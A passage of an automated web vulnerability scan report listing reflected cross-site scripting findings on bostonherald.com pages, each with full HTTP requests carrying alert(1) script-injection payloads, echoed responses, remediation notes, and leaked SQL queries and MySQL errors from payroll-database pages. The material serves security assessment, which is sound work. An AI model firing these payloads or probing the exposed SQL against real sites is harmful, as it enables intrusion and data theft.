GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalkb51c2</script><script>alert(1)</script>07de356f883 snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:02:00 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 2639 Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <!-- This Page is for Inclusion i ...[SNIP]... p://www.bostonherald.com/mediacenter/retrieve_video.php?redirect=http%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20110127%2F012711snowar.flv&video_id=2024"); tmObj.set("VideoTitle", "Sidewalkb51c2</script><script>alert(1)</script>07de356f883"); tmObj.set("Category", "");
The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e143d"><script>alert(1)</script>a9e85fd0010 was submitted in the width parameter. This input was echoed as e143d\"><script>alert(1)</script>a9e85fd0010 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370e143d"><script>alert(1)</script>a9e85fd0010&height=300&bc_id=766783859001&rand=408 HTTP/1.1 Host: www.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bhfont=12
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:40:20 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 2533 Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <!-- This Page is for Inclusion i ...[SNIP]... <div id="adCompanionSubstitute" class="w370e143d\"><script>alert(1)</script>a9e85fd0010xh300"> ...[SNIP]...
The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff39a'-alert(1)-'96f43005832 was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/politics/view.bg?articleid=1312665&format=emailff39a'-alert(1)-'96f43005832 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:35:18 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-language: en Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 44075
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdf1d'-alert(1)-'71a4876b0f9 was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/regional/view.bg?articleid=1312541&format=emailbdf1d'-alert(1)-'71a4876b0f9 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:43:44 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-language: en Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 46814
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
// Converts the GET params to a JSON object GET_Params = 'articleid=1312541&format=emailbdf1d'-alert(1)-'71a4876b0f9'.toQueryParams();
//alert(Object.inspect(GET_Params)); //----------------------------------------------------------------- function updatePage(key,val) { //---------------------------- ...[SNIP]...
4.802. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.bostonherald.com
Path:
/projects/payroll/cambridge/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f4bca(a)57e0d5026f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /projects/payroll/cambridge/?f4bca(a)57e0d5026f9=1 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:47:43 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 502 Content-Type: text/html; charset=UTF-8 Connection: close
SQL: SELECT a.*,j.full FROM `cambridgeData` a INNER JOIN `cambridgeCats` j ON j.cat_id = department_id WHERE 1=1 ORDER BY ?f4bca(a)57e0d5026f9=1 LIMIT 0,20
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?f4bca(a)57e0d5026f9=1 LIMIT 0,20' at line ...[SNIP]...
4.803. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bostonherald.com
Path:
/projects/payroll/cambridge/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c00b'-alert(1)-'f86646641f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /projects/payroll/cambridge/?5c00b'-alert(1)-'f86646641f6=1 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:47:41 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 529 Content-Type: text/html; charset=UTF-8 Connection: close
SQL: SELECT a.*,j.full FROM `cambridgeData` a INNER JOIN `cambridgeCats` j ON j.cat_id = department_id WHERE 1=1 ORDER BY ?5c00b'-alert(1)-'f86646641f6=1 LIMIT 0,20
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?5c00b'-alert(1)-'f86646641f6=1 LIMIT 0,20' at line 1<br> ...[SNIP]...
4.804. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bostonherald.com
Path:
/projects/payroll/mass_pike/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f0b5'-alert(1)-'a16c453c05d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /projects/payroll/mass_pike/?4f0b5'-alert(1)-'a16c453c05d=1 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:29:06 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 397 Content-Type: text/html; charset=UTF-8 Connection: close
SQL: SELECT * FROM `massPikePayroll` WHERE 1=1 ORDER BY ?4f0b5'-alert(1)-'a16c453c05d=1 LIMIT 0,20
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?4f0b5'-alert(1)-'a16c453c05d=1 LIMIT 0,20' at line 1<br> ...[SNIP]...
4.805. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.bostonherald.com
Path:
/projects/payroll/mass_pike/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c260f(a)d58a654d6ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /projects/payroll/mass_pike/?c260f(a)d58a654d6ed=1 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:29:08 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 370 Content-Type: text/html; charset=UTF-8 Connection: close
SQL: SELECT * FROM `massPikePayroll` WHERE 1=1 ORDER BY ?c260f(a)d58a654d6ed=1 LIMIT 0,20
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?c260f(a)d58a654d6ed=1 LIMIT 0,20' at line ...[SNIP]...
4.806. http://www.bostonherald.com/projects/payroll/quasi_state/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.bostonherald.com
Path:
/projects/payroll/quasi_state/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6c960(a)77d7148e6d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /projects/payroll/quasi_state/?6c960(a)77d7148e6d8=1 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:39:39 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 540 Content-Type: text/html; charset=UTF-8 Connection: close
SQL: SELECT a.*, b.agency FROM `quasi_state_data` a INNER JOIN `quasi_state_agencies` b ON a.quasi_state_agency_id = b.id WHERE 1=1 ORDER BY ?6c960(a)77d7148e6d8=1 LIMIT 0,20
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?6c960(a)77d7148e6d8=1 LIMIT 0,20' at line ...[SNIP]...
4.807. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.bostonherald.com
Path:
/projects/payroll/quincy/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload eb58b(a)bc791e733d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /projects/payroll/quincy/?eb58b(a)bc791e733d=1 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:35:59 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 365 Content-Type: text/html; charset=UTF-8 Connection: close
SQL: SELECT a.* FROM `quincyData` a WHERE 1=1 ORDER BY ?eb58b(a)bc791e733d=1 LIMIT 0,20
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?eb58b(a)bc791e733d=1 LIMIT 0,20' at line 1 ...[SNIP]...
4.808. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bostonherald.com
Path:
/projects/payroll/quincy/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b364'-alert(1)-'a0ab3d5c958 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /projects/payroll/quincy/?4b364'-alert(1)-'a0ab3d5c958=1 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:35:56 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 395 Content-Type: text/html; charset=UTF-8 Connection: close
SQL: SELECT a.* FROM `quincyData` a WHERE 1=1 ORDER BY ?4b364'-alert(1)-'a0ab3d5c958=1 LIMIT 0,20
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?4b364'-alert(1)-'a0ab3d5c958=1 LIMIT 0,20' at line 1<br> ...[SNIP]...
4.809. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bostonherald.com
Path:
/projects/payroll/suffolk/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a52a7'-alert(1)-'3fe2c2f08cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /projects/payroll/suffolk/?a52a7'-alert(1)-'3fe2c2f08cd=1 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; 